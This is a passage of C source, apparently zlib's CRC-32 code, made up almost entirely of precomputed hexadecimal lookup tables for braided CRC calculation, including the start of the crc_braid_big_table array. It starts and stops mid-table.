0x8744b5f4, 0x4beeb56a, 0xc561b289, 0x09cbb217, 0xac509190, 0x60fa910e, 0xee7596ed, 0x22df9673, 0x281a9f6a, 0xe4b09ff4, 0x6a3f9817, 0xa6959889, 0x7fb58a25, 0xb31f8abb, 0x3d908d58, 0xf13a8dc6, 0xfbff84df, 0x37558441, 0xb9da83a2, 0x7570833c, 0x533b85da, 0x9f918544, 0x111e82a7, 0xddb48239, 
0xd7718b20, 0x1bdb8bbe, 0x95548c5d, 0x59fe8cc3, 0x80de9e6f, 0x4c749ef1, 0xc2fb9912, 0x0e51998c, 0x04949095, 0xc83e900b, 0x46b197e8, 0x8a1b9776, 0x2f80b4f1, 0xe32ab46f, 0x6da5b38c, 0xa10fb312, 0xabcaba0b, 0x6760ba95, 0xe9efbd76, 0x2545bde8, 0xfc65af44, 0x30cfafda, 0xbe40a839, 0x72eaa8a7, 0x782fa1be, 0xb485a120, 0x3a0aa6c3, 0xf6a0a65d, 0xaa4de78c, 0x66e7e712, 0xe868e0f1, 0x24c2e06f, 0x2e07e976, 0xe2ade9e8, 0x6c22ee0b, 0xa088ee95, 0x79a8fc39, 0xb502fca7, 0x3b8dfb44, 0xf727fbda, 0xfde2f2c3, 0x3148f25d, 0xbfc7f5be, 0x736df520, 0xd6f6d6a7, 0x1a5cd639, 0x94d3d1da, 0x5879d144, 0x52bcd85d, 0x9e16d8c3, 0x1099df20, 0xdc33dfbe, 0x0513cd12, 0xc9b9cd8c, 0x4736ca6f, 0x8b9ccaf1, 0x8159c3e8, 0x4df3c376, 0xc37cc495, 0x0fd6c40b, 0x7aa64737, 0xb60c47a9, 0x3883404a, 0xf42940d4, 0xfeec49cd, 0x32464953, 0xbcc94eb0, 0x70634e2e, 0xa9435c82, 0x65e95c1c, 0xeb665bff, 0x27cc5b61, 0x2d095278, 0xe1a352e6, 0x6f2c5505, 0xa386559b, 0x061d761c, 0xcab77682, 0x44387161, 0x889271ff, 0x825778e6, 0x4efd7878, 0xc0727f9b, 0x0cd87f05, 0xd5f86da9, 0x19526d37, 0x97dd6ad4, 0x5b776a4a, 0x51b26353, 0x9d1863cd, 0x1397642e, 0xdf3d64b0, 0x83d02561, 0x4f7a25ff, 0xc1f5221c, 0x0d5f2282, 0x079a2b9b, 0xcb302b05, 0x45bf2ce6, 0x89152c78, 0x50353ed4, 0x9c9f3e4a, 0x121039a9, 0xdeba3937, 0xd47f302e, 0x18d530b0, 0x965a3753, 0x5af037cd, 0xff6b144a, 0x33c114d4, 0xbd4e1337, 0x71e413a9, 0x7b211ab0, 0xb78b1a2e, 0x39041dcd, 0xf5ae1d53, 0x2c8e0fff, 0xe0240f61, 0x6eab0882, 0xa201081c, 0xa8c40105, 0x646e019b, 0xeae10678, 0x264b06e6}, {0x00000000, 0xa6770bb4, 0x979f1129, 0x31e81a9d, 0xf44f2413, 0x52382fa7, 0x63d0353a, 0xc5a73e8e, 0x33ef4e67, 0x959845d3, 0xa4705f4e, 0x020754fa, 0xc7a06a74, 0x61d761c0, 0x503f7b5d, 0xf64870e9, 0x67de9cce, 0xc1a9977a, 0xf0418de7, 0x56368653, 0x9391b8dd, 0x35e6b369, 0x040ea9f4, 0xa279a240, 0x5431d2a9, 0xf246d91d, 0xc3aec380, 0x65d9c834, 0xa07ef6ba, 0x0609fd0e, 0x37e1e793, 0x9196ec27, 0xcfbd399c, 0x69ca3228, 0x582228b5, 0xfe552301, 0x3bf21d8f, 0x9d85163b, 0xac6d0ca6, 0x0a1a0712, 0xfc5277fb, 0x5a257c4f, 
0x6bcd66d2, 0xcdba6d66, 0x081d53e8, 0xae6a585c, 0x9f8242c1, 0x39f54975, 0xa863a552, 0x0e14aee6, 0x3ffcb47b, 0x998bbfcf, 0x5c2c8141, 0xfa5b8af5, 0xcbb39068, 0x6dc49bdc, 0x9b8ceb35, 0x3dfbe081, 0x0c13fa1c, 0xaa64f1a8, 0x6fc3cf26, 0xc9b4c492, 0xf85cde0f, 0x5e2bd5bb, 0x440b7579, 0xe27c7ecd, 0xd3946450, 0x75e36fe4, 0xb044516a, 0x16335ade, 0x27db4043, 0x81ac4bf7, 0x77e43b1e, 0xd19330aa, 0xe07b2a37, 0x460c2183, 0x83ab1f0d, 0x25dc14b9, 0x14340e24, 0xb2430590, 0x23d5e9b7, 0x85a2e203, 0xb44af89e, 0x123df32a, 0xd79acda4, 0x71edc610, 0x4005dc8d, 0xe672d739, 0x103aa7d0, 0xb64dac64, 0x87a5b6f9, 0x21d2bd4d, 0xe47583c3, 0x42028877, 0x73ea92ea, 0xd59d995e, 0x8bb64ce5, 0x2dc14751, 0x1c295dcc, 0xba5e5678, 0x7ff968f6, 0xd98e6342, 0xe86679df, 0x4e11726b, 0xb8590282, 0x1e2e0936, 0x2fc613ab, 0x89b1181f, 0x4c162691, 0xea612d25, 0xdb8937b8, 0x7dfe3c0c, 0xec68d02b, 0x4a1fdb9f, 0x7bf7c102, 0xdd80cab6, 0x1827f438, 0xbe50ff8c, 0x8fb8e511, 0x29cfeea5, 0xdf879e4c, 0x79f095f8, 0x48188f65, 0xee6f84d1, 0x2bc8ba5f, 0x8dbfb1eb, 0xbc57ab76, 0x1a20a0c2, 0x8816eaf2, 0x2e61e146, 0x1f89fbdb, 0xb9fef06f, 0x7c59cee1, 0xda2ec555, 0xebc6dfc8, 0x4db1d47c, 0xbbf9a495, 0x1d8eaf21, 0x2c66b5bc, 0x8a11be08, 0x4fb68086, 0xe9c18b32, 0xd82991af, 0x7e5e9a1b, 0xefc8763c, 0x49bf7d88, 0x78576715, 0xde206ca1, 0x1b87522f, 0xbdf0599b, 0x8c184306, 0x2a6f48b2, 0xdc27385b, 0x7a5033ef, 0x4bb82972, 0xedcf22c6, 0x28681c48, 0x8e1f17fc, 0xbff70d61, 0x198006d5, 0x47abd36e, 0xe1dcd8da, 0xd034c247, 0x7643c9f3, 0xb3e4f77d, 0x1593fcc9, 0x247be654, 0x820cede0, 0x74449d09, 0xd23396bd, 0xe3db8c20, 0x45ac8794, 0x800bb91a, 0x267cb2ae, 0x1794a833, 0xb1e3a387, 0x20754fa0, 0x86024414, 0xb7ea5e89, 0x119d553d, 0xd43a6bb3, 0x724d6007, 0x43a57a9a, 0xe5d2712e, 0x139a01c7, 0xb5ed0a73, 0x840510ee, 0x22721b5a, 0xe7d525d4, 0x41a22e60, 0x704a34fd, 0xd63d3f49, 0xcc1d9f8b, 0x6a6a943f, 0x5b828ea2, 0xfdf58516, 0x3852bb98, 0x9e25b02c, 0xafcdaab1, 0x09baa105, 0xfff2d1ec, 0x5985da58, 0x686dc0c5, 0xce1acb71, 0x0bbdf5ff, 0xadcafe4b, 0x9c22e4d6, 0x3a55ef62, 
0xabc30345, 0x0db408f1, 0x3c5c126c, 0x9a2b19d8, 0x5f8c2756, 0xf9fb2ce2, 0xc813367f, 0x6e643dcb, 0x982c4d22, 0x3e5b4696, 0x0fb35c0b, 0xa9c457bf, 0x6c636931, 0xca146285, 0xfbfc7818, 0x5d8b73ac, 0x03a0a617, 0xa5d7ada3, 0x943fb73e, 0x3248bc8a, 0xf7ef8204, 0x519889b0, 0x6070932d, 0xc6079899, 0x304fe870, 0x9638e3c4, 0xa7d0f959, 0x01a7f2ed, 0xc400cc63, 0x6277c7d7, 0x539fdd4a, 0xf5e8d6fe, 0x647e3ad9, 0xc209316d, 0xf3e12bf0, 0x55962044, 0x90311eca, 0x3646157e, 0x07ae0fe3, 0xa1d90457, 0x579174be, 0xf1e67f0a, 0xc00e6597, 0x66796e23, 0xa3de50ad, 0x05a95b19, 0x34414184, 0x92364a30}, {0x00000000, 0xcb5cd3a5, 0x4dc8a10b, 0x869472ae, 0x9b914216, 0x50cd91b3, 0xd659e31d, 0x1d0530b8, 0xec53826d, 0x270f51c8, 0xa19b2366, 0x6ac7f0c3, 0x77c2c07b, 0xbc9e13de, 0x3a0a6170, 0xf156b2d5, 0x03d6029b, 0xc88ad13e, 0x4e1ea390, 0x85427035, 0x9847408d, 0x531b9328, 0xd58fe186, 0x1ed33223, 0xef8580f6, 0x24d95353, 0xa24d21fd, 0x6911f258, 0x7414c2e0, 0xbf481145, 0x39dc63eb, 0xf280b04e, 0x07ac0536, 0xccf0d693, 0x4a64a43d, 0x81387798, 0x9c3d4720, 0x57619485, 0xd1f5e62b, 0x1aa9358e, 0xebff875b, 0x20a354fe, 0xa6372650, 0x6d6bf5f5, 0x706ec54d, 0xbb3216e8, 0x3da66446, 0xf6fab7e3, 0x047a07ad, 0xcf26d408, 0x49b2a6a6, 0x82ee7503, 0x9feb45bb, 0x54b7961e, 0xd223e4b0, 0x197f3715, 0xe82985c0, 0x23755665, 0xa5e124cb, 0x6ebdf76e, 0x73b8c7d6, 0xb8e41473, 0x3e7066dd, 0xf52cb578, 0x0f580a6c, 0xc404d9c9, 0x4290ab67, 0x89cc78c2, 0x94c9487a, 0x5f959bdf, 0xd901e971, 0x125d3ad4, 0xe30b8801, 0x28575ba4, 0xaec3290a, 0x659ffaaf, 0x789aca17, 0xb3c619b2, 0x35526b1c, 0xfe0eb8b9, 0x0c8e08f7, 0xc7d2db52, 0x4146a9fc, 0x8a1a7a59, 0x971f4ae1, 0x5c439944, 0xdad7ebea, 0x118b384f, 0xe0dd8a9a, 0x2b81593f, 0xad152b91, 0x6649f834, 0x7b4cc88c, 0xb0101b29, 0x36846987, 0xfdd8ba22, 0x08f40f5a, 0xc3a8dcff, 0x453cae51, 0x8e607df4, 0x93654d4c, 0x58399ee9, 0xdeadec47, 0x15f13fe2, 0xe4a78d37, 0x2ffb5e92, 0xa96f2c3c, 0x6233ff99, 0x7f36cf21, 0xb46a1c84, 0x32fe6e2a, 0xf9a2bd8f, 0x0b220dc1, 0xc07ede64, 0x46eaacca, 0x8db67f6f, 0x90b34fd7, 0x5bef9c72, 
0xdd7beedc, 0x16273d79, 0xe7718fac, 0x2c2d5c09, 0xaab92ea7, 0x61e5fd02, 0x7ce0cdba, 0xb7bc1e1f, 0x31286cb1, 0xfa74bf14, 0x1eb014d8, 0xd5ecc77d, 0x5378b5d3, 0x98246676, 0x852156ce, 0x4e7d856b, 0xc8e9f7c5, 0x03b52460, 0xf2e396b5, 0x39bf4510, 0xbf2b37be, 0x7477e41b, 0x6972d4a3, 0xa22e0706, 0x24ba75a8, 0xefe6a60d, 0x1d661643, 0xd63ac5e6, 0x50aeb748, 0x9bf264ed, 0x86f75455, 0x4dab87f0, 0xcb3ff55e, 0x006326fb, 0xf135942e, 0x3a69478b, 0xbcfd3525, 0x77a1e680, 0x6aa4d638, 0xa1f8059d, 0x276c7733, 0xec30a496, 0x191c11ee, 0xd240c24b, 0x54d4b0e5, 0x9f886340, 0x828d53f8, 0x49d1805d, 0xcf45f2f3, 0x04192156, 0xf54f9383, 0x3e134026, 0xb8873288, 0x73dbe12d, 0x6eded195, 0xa5820230, 0x2316709e, 0xe84aa33b, 0x1aca1375, 0xd196c0d0, 0x5702b27e, 0x9c5e61db, 0x815b5163, 0x4a0782c6, 0xcc93f068, 0x07cf23cd, 0xf6999118, 0x3dc542bd, 0xbb513013, 0x700de3b6, 0x6d08d30e, 0xa65400ab, 0x20c07205, 0xeb9ca1a0, 0x11e81eb4, 0xdab4cd11, 0x5c20bfbf, 0x977c6c1a, 0x8a795ca2, 0x41258f07, 0xc7b1fda9, 0x0ced2e0c, 0xfdbb9cd9, 0x36e74f7c, 0xb0733dd2, 0x7b2fee77, 0x662adecf, 0xad760d6a, 0x2be27fc4, 0xe0beac61, 0x123e1c2f, 0xd962cf8a, 0x5ff6bd24, 0x94aa6e81, 0x89af5e39, 0x42f38d9c, 0xc467ff32, 0x0f3b2c97, 0xfe6d9e42, 0x35314de7, 0xb3a53f49, 0x78f9ecec, 0x65fcdc54, 0xaea00ff1, 0x28347d5f, 0xe368aefa, 0x16441b82, 0xdd18c827, 0x5b8cba89, 0x90d0692c, 0x8dd55994, 0x46898a31, 0xc01df89f, 0x0b412b3a, 0xfa1799ef, 0x314b4a4a, 0xb7df38e4, 0x7c83eb41, 0x6186dbf9, 0xaada085c, 0x2c4e7af2, 0xe712a957, 0x15921919, 0xdececabc, 0x585ab812, 0x93066bb7, 0x8e035b0f, 0x455f88aa, 0xc3cbfa04, 0x089729a1, 0xf9c19b74, 0x329d48d1, 0xb4093a7f, 0x7f55e9da, 0x6250d962, 0xa90c0ac7, 0x2f987869, 0xe4c4abcc}, {0x00000000, 0x3d6029b0, 0x7ac05360, 0x47a07ad0, 0xf580a6c0, 0xc8e08f70, 0x8f40f5a0, 0xb220dc10, 0x30704bc1, 0x0d106271, 0x4ab018a1, 0x77d03111, 0xc5f0ed01, 0xf890c4b1, 0xbf30be61, 0x825097d1, 0x60e09782, 0x5d80be32, 0x1a20c4e2, 0x2740ed52, 0x95603142, 0xa80018f2, 0xefa06222, 0xd2c04b92, 0x5090dc43, 0x6df0f5f3, 0x2a508f23, 0x1730a693, 
0xa5107a83, 0x98705333, 0xdfd029e3, 0xe2b00053, 0xc1c12f04, 0xfca106b4, 0xbb017c64, 0x866155d4, 0x344189c4, 0x0921a074, 0x4e81daa4, 0x73e1f314, 0xf1b164c5, 0xccd14d75, 0x8b7137a5, 0xb6111e15, 0x0431c205, 0x3951ebb5, 0x7ef19165, 0x4391b8d5, 0xa121b886, 0x9c419136, 0xdbe1ebe6, 0xe681c256, 0x54a11e46, 0x69c137f6, 0x2e614d26, 0x13016496, 0x9151f347, 0xac31daf7, 0xeb91a027, 0xd6f18997, 0x64d15587, 0x59b17c37, 0x1e1106e7, 0x23712f57, 0x58f35849, 0x659371f9, 0x22330b29, 0x1f532299, 0xad73fe89, 0x9013d739, 0xd7b3ade9, 0xead38459, 0x68831388, 0x55e33a38, 0x124340e8, 0x2f236958, 0x9d03b548, 0xa0639cf8, 0xe7c3e628, 0xdaa3cf98, 0x3813cfcb, 0x0573e67b, 0x42d39cab, 0x7fb3b51b, 0xcd93690b, 0xf0f340bb, 0xb7533a6b, 0x8a3313db, 0x0863840a, 0x3503adba, 0x72a3d76a, 0x4fc3feda, 0xfde322ca, 0xc0830b7a, 0x872371aa, 0xba43581a, 0x9932774d, 0xa4525efd, 0xe3f2242d, 0xde920d9d, 0x6cb2d18d, 0x51d2f83d, 0x167282ed, 0x2b12ab5d, 0xa9423c8c, 0x9422153c, 0xd3826fec, 0xeee2465c, 0x5cc29a4c, 0x61a2b3fc, 0x2602c92c, 0x1b62e09c, 0xf9d2e0cf, 0xc4b2c97f, 0x8312b3af, 0xbe729a1f, 0x0c52460f, 0x31326fbf, 0x7692156f, 0x4bf23cdf, 0xc9a2ab0e, 0xf4c282be, 0xb362f86e, 0x8e02d1de, 0x3c220dce, 0x0142247e, 0x46e25eae, 0x7b82771e, 0xb1e6b092, 0x8c869922, 0xcb26e3f2, 0xf646ca42, 0x44661652, 0x79063fe2, 0x3ea64532, 0x03c66c82, 0x8196fb53, 0xbcf6d2e3, 0xfb56a833, 0xc6368183, 0x74165d93, 0x49767423, 0x0ed60ef3, 0x33b62743, 0xd1062710, 0xec660ea0, 0xabc67470, 0x96a65dc0, 0x248681d0, 0x19e6a860, 0x5e46d2b0, 0x6326fb00, 0xe1766cd1, 0xdc164561, 0x9bb63fb1, 0xa6d61601, 0x14f6ca11, 0x2996e3a1, 0x6e369971, 0x5356b0c1, 0x70279f96, 0x4d47b626, 0x0ae7ccf6, 0x3787e546, 0x85a73956, 0xb8c710e6, 0xff676a36, 0xc2074386, 0x4057d457, 0x7d37fde7, 0x3a978737, 0x07f7ae87, 0xb5d77297, 0x88b75b27, 0xcf1721f7, 0xf2770847, 0x10c70814, 0x2da721a4, 0x6a075b74, 0x576772c4, 0xe547aed4, 0xd8278764, 0x9f87fdb4, 0xa2e7d404, 0x20b743d5, 0x1dd76a65, 0x5a7710b5, 0x67173905, 0xd537e515, 0xe857cca5, 0xaff7b675, 0x92979fc5, 0xe915e8db, 0xd475c16b, 
0x93d5bbbb, 0xaeb5920b, 0x1c954e1b, 0x21f567ab, 0x66551d7b, 0x5b3534cb, 0xd965a31a, 0xe4058aaa, 0xa3a5f07a, 0x9ec5d9ca, 0x2ce505da, 0x11852c6a, 0x562556ba, 0x6b457f0a, 0x89f57f59, 0xb49556e9, 0xf3352c39, 0xce550589, 0x7c75d999, 0x4115f029, 0x06b58af9, 0x3bd5a349, 0xb9853498, 0x84e51d28, 0xc34567f8, 0xfe254e48, 0x4c059258, 0x7165bbe8, 0x36c5c138, 0x0ba5e888, 0x28d4c7df, 0x15b4ee6f, 0x521494bf, 0x6f74bd0f, 0xdd54611f, 0xe03448af, 0xa794327f, 0x9af41bcf, 0x18a48c1e, 0x25c4a5ae, 0x6264df7e, 0x5f04f6ce, 0xed242ade, 0xd044036e, 0x97e479be, 0xaa84500e, 0x4834505d, 0x755479ed, 0x32f4033d, 0x0f942a8d, 0xbdb4f69d, 0x80d4df2d, 0xc774a5fd, 0xfa148c4d, 0x78441b9c, 0x4524322c, 0x028448fc, 0x3fe4614c, 0x8dc4bd5c, 0xb0a494ec, 0xf704ee3c, 0xca64c78c}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0xb029603d, 0x6053c07a, 0xd07aa047, 0xc0a680f5, 0x708fe0c8, 0xa0f5408f, 0x10dc20b2, 0xc14b7030, 0x7162100d, 0xa118b04a, 0x1131d077, 0x01edf0c5, 0xb1c490f8, 0x61be30bf, 0xd1975082, 0x8297e060, 0x32be805d, 0xe2c4201a, 0x52ed4027, 0x42316095, 0xf21800a8, 0x2262a0ef, 0x924bc0d2, 0x43dc9050, 0xf3f5f06d, 0x238f502a, 0x93a63017, 0x837a10a5, 0x33537098, 0xe329d0df, 0x5300b0e2, 0x042fc1c1, 0xb406a1fc, 0x647c01bb, 0xd4556186, 0xc4894134, 0x74a02109, 0xa4da814e, 0x14f3e173, 0xc564b1f1, 0x754dd1cc, 0xa537718b, 0x151e11b6, 0x05c23104, 0xb5eb5139, 0x6591f17e, 0xd5b89143, 0x86b821a1, 0x3691419c, 0xe6ebe1db, 0x56c281e6, 0x461ea154, 0xf637c169, 0x264d612e, 0x96640113, 0x47f35191, 0xf7da31ac, 0x27a091eb, 0x9789f1d6, 0x8755d164, 0x377cb159, 0xe706111e, 0x572f7123, 0x4958f358, 0xf9719365, 0x290b3322, 0x9922531f, 0x89fe73ad, 0x39d71390, 0xe9adb3d7, 0x5984d3ea, 0x88138368, 0x383ae355, 0xe8404312, 0x5869232f, 0x48b5039d, 0xf89c63a0, 0x28e6c3e7, 0x98cfa3da, 0xcbcf1338, 0x7be67305, 0xab9cd342, 0x1bb5b37f, 0x0b6993cd, 0xbb40f3f0, 0x6b3a53b7, 0xdb13338a, 0x0a846308, 0xbaad0335, 0x6ad7a372, 0xdafec34f, 0xca22e3fd, 0x7a0b83c0, 0xaa712387, 0x1a5843ba, 0x4d773299, 0xfd5e52a4, 0x2d24f2e3, 
0x9d0d92de, 0x8dd1b26c, 0x3df8d251, 0xed827216, 0x5dab122b, 0x8c3c42a9, 0x3c152294, 0xec6f82d3, 0x5c46e2ee, 0x4c9ac25c, 0xfcb3a261, 0x2cc90226, 0x9ce0621b, 0xcfe0d2f9, 0x7fc9b2c4, 0xafb31283, 0x1f9a72be, 0x0f46520c, 0xbf6f3231, 0x6f159276, 0xdf3cf24b, 0x0eaba2c9, 0xbe82c2f4, 0x6ef862b3, 0xded1028e, 0xce0d223c, 0x7e244201, 0xae5ee246, 0x1e77827b, 0x92b0e6b1, 0x2299868c, 0xf2e326cb, 0x42ca46f6, 0x52166644, 0xe23f0679, 0x3245a63e, 0x826cc603, 0x53fb9681, 0xe3d2f6bc, 0x33a856fb, 0x838136c6, 0x935d1674, 0x23747649, 0xf30ed60e, 0x4327b633, 0x102706d1, 0xa00e66ec, 0x7074c6ab, 0xc05da696, 0xd0818624, 0x60a8e619, 0xb0d2465e, 0x00fb2663, 0xd16c76e1, 0x614516dc, 0xb13fb69b, 0x0116d6a6, 0x11caf614, 0xa1e39629, 0x7199366e, 0xc1b05653, 0x969f2770, 0x26b6474d, 0xf6cce70a, 0x46e58737, 0x5639a785, 0xe610c7b8, 0x366a67ff, 0x864307c2, 0x57d45740, 0xe7fd377d, 0x3787973a, 0x87aef707, 0x9772d7b5, 0x275bb788, 0xf72117cf, 0x470877f2, 0x1408c710, 0xa421a72d, 0x745b076a, 0xc4726757, 0xd4ae47e5, 0x648727d8, 0xb4fd879f, 0x04d4e7a2, 0xd543b720, 0x656ad71d, 0xb510775a, 0x05391767, 0x15e537d5, 0xa5cc57e8, 0x75b6f7af, 0xc59f9792, 0xdbe815e9, 0x6bc175d4, 0xbbbbd593, 0x0b92b5ae, 0x1b4e951c, 0xab67f521, 0x7b1d5566, 0xcb34355b, 0x1aa365d9, 0xaa8a05e4, 0x7af0a5a3, 0xcad9c59e, 0xda05e52c, 0x6a2c8511, 0xba562556, 0x0a7f456b, 0x597ff589, 0xe95695b4, 0x392c35f3, 0x890555ce, 0x99d9757c, 0x29f01541, 0xf98ab506, 0x49a3d53b, 0x983485b9, 0x281de584, 0xf86745c3, 0x484e25fe, 0x5892054c, 0xe8bb6571, 0x38c1c536, 0x88e8a50b, 0xdfc7d428, 0x6feeb415, 0xbf941452, 0x0fbd746f, 0x1f6154dd, 0xaf4834e0, 0x7f3294a7, 0xcf1bf49a, 0x1e8ca418, 0xaea5c425, 0x7edf6462, 0xcef6045f, 0xde2a24ed, 0x6e0344d0, 0xbe79e497, 0x0e5084aa, 0x5d503448, 0xed795475, 0x3d03f432, 0x8d2a940f, 0x9df6b4bd, 0x2ddfd480, 0xfda574c7, 0x4d8c14fa, 0x9c1b4478, 0x2c322445, 0xfc488402, 0x4c61e43f, 0x5cbdc48d, 0xec94a4b0, 0x3cee04f7, 0x8cc764ca}, {0x00000000, 0xa5d35ccb, 0x0ba1c84d, 0xae729486, 0x1642919b, 0xb391cd50, 0x1de359d6, 0xb830051d, 0x6d8253ec, 
0xc8510f27, 0x66239ba1, 0xc3f0c76a, 0x7bc0c277, 0xde139ebc, 0x70610a3a, 0xd5b256f1, 0x9b02d603, 0x3ed18ac8, 0x90a31e4e, 0x35704285, 0x8d404798, 0x28931b53, 0x86e18fd5, 0x2332d31e, 0xf68085ef, 0x5353d924, 0xfd214da2, 0x58f21169, 0xe0c21474, 0x451148bf, 0xeb63dc39, 0x4eb080f2, 0x3605ac07, 0x93d6f0cc, 0x3da4644a, 0x98773881, 0x20473d9c, 0x85946157, 0x2be6f5d1, 0x8e35a91a, 0x5b87ffeb, 0xfe54a320, 0x502637a6, 0xf5f56b6d, 0x4dc56e70, 0xe81632bb, 0x4664a63d, 0xe3b7faf6, 0xad077a04, 0x08d426cf, 0xa6a6b249, 0x0375ee82, 0xbb45eb9f, 0x1e96b754, 0xb0e423d2, 0x15377f19, 0xc08529e8, 0x65567523, 0xcb24e1a5, 0x6ef7bd6e, 0xd6c7b873, 0x7314e4b8, 0xdd66703e, 0x78b52cf5, 0x6c0a580f, 0xc9d904c4, 0x67ab9042, 0xc278cc89, 0x7a48c994, 0xdf9b955f, 0x71e901d9, 0xd43a5d12, 0x01880be3, 0xa45b5728, 0x0a29c3ae, 0xaffa9f65, 0x17ca9a78, 0xb219c6b3, 0x1c6b5235, 0xb9b80efe, 0xf7088e0c, 0x52dbd2c7, 0xfca94641, 0x597a1a8a, 0xe14a1f97, 0x4499435c, 0xeaebd7da, 0x4f388b11, 0x9a8adde0, 0x3f59812b, 0x912b15ad, 0x34f84966, 0x8cc84c7b, 0x291b10b0, 0x87698436, 0x22bad8fd, 0x5a0ff408, 0xffdca8c3, 0x51ae3c45, 0xf47d608e, 0x4c4d6593, 0xe99e3958, 0x47ecadde, 0xe23ff115, 0x378da7e4, 0x925efb2f, 0x3c2c6fa9, 0x99ff3362, 0x21cf367f, 0x841c6ab4, 0x2a6efe32, 0x8fbda2f9, 0xc10d220b, 0x64de7ec0, 0xcaacea46, 0x6f7fb68d, 0xd74fb390, 0x729cef5b, 0xdcee7bdd, 0x793d2716, 0xac8f71e7, 0x095c2d2c, 0xa72eb9aa, 0x02fde561, 0xbacde07c, 0x1f1ebcb7, 0xb16c2831, 0x14bf74fa, 0xd814b01e, 0x7dc7ecd5, 0xd3b57853, 0x76662498, 0xce562185, 0x6b857d4e, 0xc5f7e9c8, 0x6024b503, 0xb596e3f2, 0x1045bf39, 0xbe372bbf, 0x1be47774, 0xa3d47269, 0x06072ea2, 0xa875ba24, 0x0da6e6ef, 0x4316661d, 0xe6c53ad6, 0x48b7ae50, 0xed64f29b, 0x5554f786, 0xf087ab4d, 0x5ef53fcb, 0xfb266300, 0x2e9435f1, 0x8b47693a, 0x2535fdbc, 0x80e6a177, 0x38d6a46a, 0x9d05f8a1, 0x33776c27, 0x96a430ec, 0xee111c19, 0x4bc240d2, 0xe5b0d454, 0x4063889f, 0xf8538d82, 0x5d80d149, 0xf3f245cf, 0x56211904, 0x83934ff5, 0x2640133e, 0x883287b8, 0x2de1db73, 0x95d1de6e, 0x300282a5, 0x9e701623, 
0x3ba34ae8, 0x7513ca1a, 0xd0c096d1, 0x7eb20257, 0xdb615e9c, 0x63515b81, 0xc682074a, 0x68f093cc, 0xcd23cf07, 0x189199f6, 0xbd42c53d, 0x133051bb, 0xb6e30d70, 0x0ed3086d, 0xab0054a6, 0x0572c020, 0xa0a19ceb, 0xb41ee811, 0x11cdb4da, 0xbfbf205c, 0x1a6c7c97, 0xa25c798a, 0x078f2541, 0xa9fdb1c7, 0x0c2eed0c, 0xd99cbbfd, 0x7c4fe736, 0xd23d73b0, 0x77ee2f7b, 0xcfde2a66, 0x6a0d76ad, 0xc47fe22b, 0x61acbee0, 0x2f1c3e12, 0x8acf62d9, 0x24bdf65f, 0x816eaa94, 0x395eaf89, 0x9c8df342, 0x32ff67c4, 0x972c3b0f, 0x429e6dfe, 0xe74d3135, 0x493fa5b3, 0xececf978, 0x54dcfc65, 0xf10fa0ae, 0x5f7d3428, 0xfaae68e3, 0x821b4416, 0x27c818dd, 0x89ba8c5b, 0x2c69d090, 0x9459d58d, 0x318a8946, 0x9ff81dc0, 0x3a2b410b, 0xef9917fa, 0x4a4a4b31, 0xe438dfb7, 0x41eb837c, 0xf9db8661, 0x5c08daaa, 0xf27a4e2c, 0x57a912e7, 0x19199215, 0xbccacede, 0x12b85a58, 0xb76b0693, 0x0f5b038e, 0xaa885f45, 0x04facbc3, 0xa1299708, 0x749bc1f9, 0xd1489d32, 0x7f3a09b4, 0xdae9557f, 0x62d95062, 0xc70a0ca9, 0x6978982f, 0xccabc4e4}, {0x00000000, 0xb40b77a6, 0x29119f97, 0x9d1ae831, 0x13244ff4, 0xa72f3852, 0x3a35d063, 0x8e3ea7c5, 0x674eef33, 0xd3459895, 0x4e5f70a4, 0xfa540702, 0x746aa0c7, 0xc061d761, 0x5d7b3f50, 0xe97048f6, 0xce9cde67, 0x7a97a9c1, 0xe78d41f0, 0x53863656, 0xddb89193, 0x69b3e635, 0xf4a90e04, 0x40a279a2, 0xa9d23154, 0x1dd946f2, 0x80c3aec3, 0x34c8d965, 0xbaf67ea0, 0x0efd0906, 0x93e7e137, 0x27ec9691, 0x9c39bdcf, 0x2832ca69, 0xb5282258, 0x012355fe, 0x8f1df23b, 0x3b16859d, 0xa60c6dac, 0x12071a0a, 0xfb7752fc, 0x4f7c255a, 0xd266cd6b, 0x666dbacd, 0xe8531d08, 0x5c586aae, 0xc142829f, 0x7549f539, 0x52a563a8, 0xe6ae140e, 0x7bb4fc3f, 0xcfbf8b99, 0x41812c5c, 0xf58a5bfa, 0x6890b3cb, 0xdc9bc46d, 0x35eb8c9b, 0x81e0fb3d, 0x1cfa130c, 0xa8f164aa, 0x26cfc36f, 0x92c4b4c9, 0x0fde5cf8, 0xbbd52b5e, 0x79750b44, 0xcd7e7ce2, 0x506494d3, 0xe46fe375, 0x6a5144b0, 0xde5a3316, 0x4340db27, 0xf74bac81, 0x1e3be477, 0xaa3093d1, 0x372a7be0, 0x83210c46, 0x0d1fab83, 0xb914dc25, 0x240e3414, 0x900543b2, 0xb7e9d523, 0x03e2a285, 0x9ef84ab4, 0x2af33d12, 0xa4cd9ad7, 
0x10c6ed71, 0x8ddc0540, 0x39d772e6, 0xd0a73a10, 0x64ac4db6, 0xf9b6a587, 0x4dbdd221, 0xc38375e4, 0x77880242, 0xea92ea73, 0x5e999dd5, 0xe54cb68b, 0x5147c12d, 0xcc5d291c, 0x78565eba, 0xf668f97f, 0x42638ed9, 0xdf7966e8, 0x6b72114e, 0x820259b8, 0x36092e1e, 0xab13c62f, 0x1f18b189, 0x9126164c, 0x252d61ea, 0xb83789db, 0x0c3cfe7d, 0x2bd068ec, 0x9fdb1f4a, 0x02c1f77b, 0xb6ca80dd, 0x38f42718, 0x8cff50be, 0x11e5b88f, 0xa5eecf29, 0x4c9e87df, 0xf895f079, 0x658f1848, 0xd1846fee, 0x5fbac82b, 0xebb1bf8d, 0x76ab57bc, 0xc2a0201a, 0xf2ea1688, 0x46e1612e, 0xdbfb891f, 0x6ff0feb9, 0xe1ce597c, 0x55c52eda, 0xc8dfc6eb, 0x7cd4b14d, 0x95a4f9bb, 0x21af8e1d, 0xbcb5662c, 0x08be118a, 0x8680b64f, 0x328bc1e9, 0xaf9129d8, 0x1b9a5e7e, 0x3c76c8ef, 0x887dbf49, 0x15675778, 0xa16c20de, 0x2f52871b, 0x9b59f0bd, 0x0643188c, 0xb2486f2a, 0x5b3827dc, 0xef33507a, 0x7229b84b, 0xc622cfed, 0x481c6828, 0xfc171f8e, 0x610df7bf, 0xd5068019, 0x6ed3ab47, 0xdad8dce1, 0x47c234d0, 0xf3c94376, 0x7df7e4b3, 0xc9fc9315, 0x54e67b24, 0xe0ed0c82, 0x099d4474, 